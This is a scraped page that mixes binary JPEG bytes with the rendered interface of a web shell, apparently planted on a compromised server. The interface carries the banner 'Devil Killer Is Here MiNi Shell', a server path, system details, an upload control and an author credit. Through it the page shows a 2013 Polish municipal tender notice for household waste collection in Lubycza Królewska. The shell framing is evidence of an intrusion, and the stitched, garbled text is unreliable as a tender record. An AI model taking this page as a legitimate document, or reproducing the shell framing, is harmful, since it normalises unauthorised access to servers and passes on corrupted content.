JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130516/191708-N-2013.html

<p class="kh_header"><b>Lubycza Królewska: ODBIÓR I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH OD WŁAŚCICIELI NIERUCHOMOŚCI ZAMIESZKAŁYCH PRZEZ MIESZKAŃCÓW W GMINIE LUBYCZA KRÓLEWSKA</b><br>
<b>Numer ogłoszenia: 191708 - 2013; data zamieszczenia: 16.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lubycza Królewska , ul. Kolejowa 1, 22-680 Lubycza Królewska, woj. lubelskie, tel. 84 6617002, faks 84 6617412.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubycza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ODBIÓR I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH OD WŁAŚCICIELI NIERUCHOMOŚCI ZAMIESZKAŁYCH PRZEZ MIESZKAŃCÓW W GMINIE LUBYCZA KRÓLEWSKA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych przez mieszkańców w Gminie Lubycza Królewska.
2.ZABUDOWA JEDNORODZINNA I ZAGRODOWA
2.1.Pojemniki na zmieszane odpady komunalne w zabudowie jednorodzinnej zapewnia właściciel nieruchomości w formie zakupu we własnym zakresie lub dzierżawy od Wykonawcy. 
2.2.Wykonawca zapewnia worki do selektywnej zbiórki odpadów komunalnych.
2.3.Wykonawca jest zobowiązany do posprzątania miejsca wokół wystawionych na dzień odbioru pojemników, gdy zajdzie taka potrzeba.
2.4.Na terenie zabudowy jednorodzinnej obowiązywał będzie system mieszany workowo - pojemnikowy zbiórki odpadów komunalnych.
2.5.Minimalna pojemność pojemników ustawionych na nieruchomości zamieszkałej na obszarze o zabudowie jednorodzinnej i zagrodowej, jeżeli z takiego pojemnika korzysta winna być zgodna z regulaminem utrzymania czystości i porządku na terenie Gminy Lubycza Królewska.
2.6.Zmieszane odpady komunalne gromadzone będą w pojemnikach. Pojemniki te, na dzień odbioru wystawiane będą w pasie drogowym  drogi publicznej. 
Częstotliwość wywozu przez Wykonawcę odpadów zmieszanych - raz w miesiącu zgodnie z ustalonym przez Wykonawcę i zatwierdzonym przez Zamawiającego harmonogramem wywozu w godzinach 7:00 - 18:00. 
Harmonogram będzie podany do informacji właścicielom posesji oraz dostępny na stronie internetowej Urzędu Gminy.
2.7.Selektywna zbiórka odpadów komunalnych na terenie zabudowy jednorodzinnej będzie odbywać się w systemie workowym.  Worki z selektywnie zebranymi odpadami na dzień odbioru wystawiane będą w pasie drogowym  drogi publicznej. 
2.8.Wprowadza się następujące rodzaje worków:
a)żółty - na tworzywa sztuczne i wielomateriałowe, papier i tekturę,
b)biały - na szkło opakowaniowe bezbarwne i kolorowe, metale,
c)zielony - na odpady ulegające biodegradacji,
d)pojemnik metalowy - na popiół i żużel.
Częstotliwość załadunku i wywozu przez wykonawcę odpadów zbieranych selektywnie zgodnie z ustalonym przez Wykonawcę, zatwierdzonym przez Zamawiającego 
i podanym do informacji właścicielom posesji harmonogramem wywozu w godzinach 7:00 - 18:00:
a)tworzywa sztuczne i wielomateriałowe, papier, tektura - 1 raz na dwa miesiące,
b)szkło opakowaniowe bezbarwne i kolorowe, metale - 1 raz na dwa miesiące,
c)popiół i żużel - nie rzadziej niż 1 raz na kwartał.
2.9.Meble i odpady wielkogabarytowe  - będą odbierane w wyznaczonych punktach lub punkcie mobilnego selektywnego zbierania odpadów komunalnych.
2.10.	Zużyty sprzęt elektryczny i elektroniczny - należy przekazać sprzedawcy detalicznemu lub dostarczyć do wyznaczonych punktów lub punktu mobilnego selektywnego zbierania odpadów komunalnych.
2.11.	Odpady budowlane i rozbiórkowe powstałe w wyniku prowadzenia drobnych robót - należy umieszczać w pojemniku na zmieszane odpady komunalne.
2.12.	Odpady ulegające biodegradacji (odpady ogrodowe, zielone) - należy dostarczyć do punktu mobilnego selektywnego zbierania odpadów komunalnych.
2.13.	Zużyte opony - należy dostarczyć do mobilnego selektywnego punktu zbierania odpadów komunalnych.
2.14.	Mobilne punkty selektywnej zbiórki odpadów będą odbierać poszczególne frakcje odpadów posegregowanych z pasa drogi publicznej przyległej do nieruchomości dwa razy w roku zgodnie z harmonogramem przedstawionym przez Wykonawcę 
i zatwierdzonym przez Zamawiającego.
Harmonogram będzie podany do informacji właścicielom posesji oraz dostępny na stronie internetowej Urzędu Gminy.
2.15.	Inne odpady - postępowanie zgodnie z Regulaminem utrzymania czystości i porządku na terenie Gminy Lubycza Królewska.
3.ZABUDOWA WIELORODZINNA
3.1.Na terenie zabudowy wielorodzinnej obowiązywał będzie system pojemnikowy zbiórki odpadów komunalnych.
3.2.Minimalna pojemność pojemników ustawionych na nieruchomości zamieszkałej na obszarze o zabudowie wielorodzinnej, jeżeli z takiego pojemnika korzysta winna być zgodna z Regulaminem utrzymania czystości i porządku na terenie Gminy Lubycza Królewska.
3.3.Pojemniki do gromadzenia zmieszanych odpadów zapewni Wykonawca i ustawi je w miejscach do tego przeznaczonych.  Zarządcy posesji zabudowy wielorodzinnej muszą przygotować miejsca do usytuowania pojemników na odpady.
Częstotliwość wywozu przez Wykonawcę odpadów zmieszanych - co najmniej raz 
w miesiącu zgodnie z ustalonym przez Wykonawcę i zatwierdzonym przez Zamawiającego harmonogramem wywozu w godzinach  7:00 - 18:00.
Harmonogram będzie podany do informacji zarządcom posesji oraz dostępny na stronie internetowej Urzędu Gminy.
3.4.Selektywna zbiórka odpadów komunalnych na terenie zabudowy wielorodzinnej odbywać się będzie do pojemników, które zarządcy posesji otrzymają od Wykonawcy.
Obowiązują następujące rodzaje pojemników:
a)niebieski - na papier i tekturę oraz tekstylia,
b)żółty - na tworzywa sztuczne i wielomateriałowe,
c)biały - na szkło opakowaniowe bezbarwne i kolorowe, metale
d)zielony - na odpady ulegające biodegradacji,
e)pojemnik metalowy - na popiół i żużel (nie dotyczy budynków wyposażonych 
w instalację gazową).
Częstotliwość załadunku i wywozu przez wykonawcę odpadów zbieranych selektywnie:
a)papier, tektura, tworzywa sztuczne i wielomateriałowe, szkło opakowaniowe bezbarwne i kolorowe, metale - w miarę potrzeb (na telefoniczne zgłoszenie właściciela nieruchomości), nie rzadziej jednak niż 1 raz w miesiącu w godzinach  7:00-18:00.
b)popiół, żużel - nie rzadziej niż 1 raz w miesiącu w godzinach  7:00-18:00,
c)odpady ulegające biodegradacji - nie rzadziej niż 1 raz w miesiącu w godzinach  7:00-18:00.
3.5.Meble i odpady wielkogabarytowe  - będą odbierane w wyznaczonych punktach lub punkcie mobilnego selektywnego zbierania odpadów komunalnych.
3.6.Zużyty sprzęt elektryczny i elektroniczny - należy przekazać sprzedawcy detalicznemu lub dostarczyć do wyznaczonych punktów lub punktu mobilnego selektywnego zbierania odpadów komunalnych.
3.7.Odpady budowlane i rozbiórkowe w wyniku prowadzenia drobnych robót - należy umieszczać w pojemniku na zmieszane odpady komunalne.
3.8.Zużyte opony - należy dostarczyć do mobilnego selektywnego punktu zbierania odpadów komunalnych. 
3.9.Mobilne punkty selektywnej zbiórki odpadów będą odbierać poszczególne frakcje odpadów posegregowanych od pkt 3.5. do pkt 3.8. z miejsca ich wytworzenia dwa razy 
w roku zgodnie z harmonogramem przedstawionym przez Wykonawcę i zatwierdzonym przez Zamawiającego. 
Harmonogram będzie podany do informacji właścicielom/zarządcom posesji oraz dostępny na stronie internetowej Urzędu Gminy.
3.10.	Inne odpady - postępowanie zgodnie z Regulaminem utrzymania czystości i porządku na terenie Gminy Lubycza Królewska.
4.Charakterystyka worków do selektywnej zbiórki odpadów:
a)materiał - folia polietylenowa LDPE,
b)pojemność - 120 dm3,
c)kolor - żółty, biały, zielony,
d)grubość - co najmniej 60 mikronów, 
e)nadruk - jednostronny, w widocznym miejscu na tle, odpowiadający kolorom dla danego rodzaju odpadów widoczny napis. 
5.Charakterystyka pojemników do zbiórki odpadów komunalnych - zgodnie 
z Rozdziałem 3 Regulaminu o utrzymaniu czystości i porządku na terenie Gminy Lubycza Królewska.
6.Szczegółowe dane charakteryzujące zamówienie:
6.1.Powierzchnia Gminy Lubycza Królewska wynosi ok. 21 000,00 ha. 
6.2.W skład Gminy Lubycza Królewska wchodzi 24 sołectwa, które obejmują łącznie 
34 miejscowości.
6.3.Liczba zameldowanych osób w Gminie Lubycza Królewska wynosi 6898 (stan na dzień 08.05.2013r.), natomiast można przyjąć iż ok. 1/3 wszystkich osób zameldowanych zamieszkuje poza granicami Gminy Lubycza Królewska.
6.4.Szacunkowa liczba zabudowań jednorodzinnych wynosi ok. 1400, zaś wielorodzinnych  ok. 26.
6.5.Powyższe dane mogą ulec zmianie na skutek ruchu ludności oraz zamieszkania nowych budynków bądź wyludnienia.
6.6.Na podstawie złożonych dotychczas deklaracji szacuje się, iż mieszkańcy Gminy Lubycza Królewska w ilości ok. 85% będą segregować odpady w sposób selektywny. 
6.7.Szacuje się, iż w 2013 roku ilość wytworzonych odpadów komunalnych będzie na poziomie 700-1000 ton rocznie.
7.Wykonawca zobowiązany jest do odbierania odpadów komunalnych z poszczególnych nieruchomości zgodnie z przygotowanym przez siebie i zatwierdzonym przez Zamawiającego harmonogramem wywozu.  Wykonawca obowiązany jest do przedstawienia harmonogramu wywozu do 30 czerwca 2013 r. Wszelkie zmiany harmonogramu będą wymagały zgody Zamawiającego, a Wykonawca będzie zobowiązany do dostarczenia zmienionych harmonogramów do każdej nieruchomości objętej odbiorem odpadów komunalnych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca składa oświadczenie zgodnie z art. 22 ust. 1 pkt 1-4 ustawy Pzp.
2. Wykonawca składa następujące dokumenty:
- aktualne zezwolenie na zbieranie i transportowanie odpadów wydane przez właściwy organ zgodnie z ustawą z dnia 14 grudnia 2012 r. (Dz. U. z 2013r. , poz. 21),
- aktualny wpis do rejestru działalności regulowanej prowadzonego przez Wójta Gminy Lubycza Królewska, w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości,
- aktualny wpis do rejestru w zakresie odbioru zużytego sprzętu elektrycznego
 i elektronicznego,
- aktualne zezwolenie na prowadzenie działalności w zakresie przetwarzania odpadów komunalnych lub zapewnienie gotowości przyjęcia odpadów komunalnych przez przedsiębiorcę prowadzącego działalność w zakresie odzysku lub unieszkodliwiania odpadów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca składa oświadczenie zgodnie z art. 22 ust. 1 pkt 1-4 ustawy Pzp.
2. Wykonawca wykazuje co najmniej jedną usługę, określając równocześnie jej przedmiot, wartość, datę wykonania, podmiot, na rzecz którego usługa została wykonana a także załączają dowody określające czy wykazane usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca składa oświadczenie zgodnie z art. 22 ust. 1 pkt 1-4 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca składa oświadczenie zgodnie z art. 22 ust. 1 pkt 1-4 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca składa oświadczenie zgodnie z art. 22 ust. 1 pkt 1-4 ustawy Pzp.
2. Wykonawca przedkłada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, przy czym minimalna suma gwarancyjna ubezpieczenia wynosi 500 000,00 (słownie: pięćset tysięcy złotych 00/100 groszy)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy.
2. Pełnomocnictwo (jeżeli dotyczy).
3. Oświadczenie o spełnianiu warunków określonych w rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości. 
4. Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, polega na zasobach innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
5. Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda dokumentów dotyczących w szczególności:
- Zakresu dostępnych wykonawcy zasobów innego podmiotu.
- Sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia.
- Charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem.
- Zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubycza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Lubycza Królewska, ul. Kolejowa 1, 22 - 680 Lubycza Królewska pok. nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2013 godzina 11:30, miejsce: Gmina Lubycza Królewska, ul. Kolejowa 1, 22 - 680 Lubycza Królewska, pokój nr 16 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com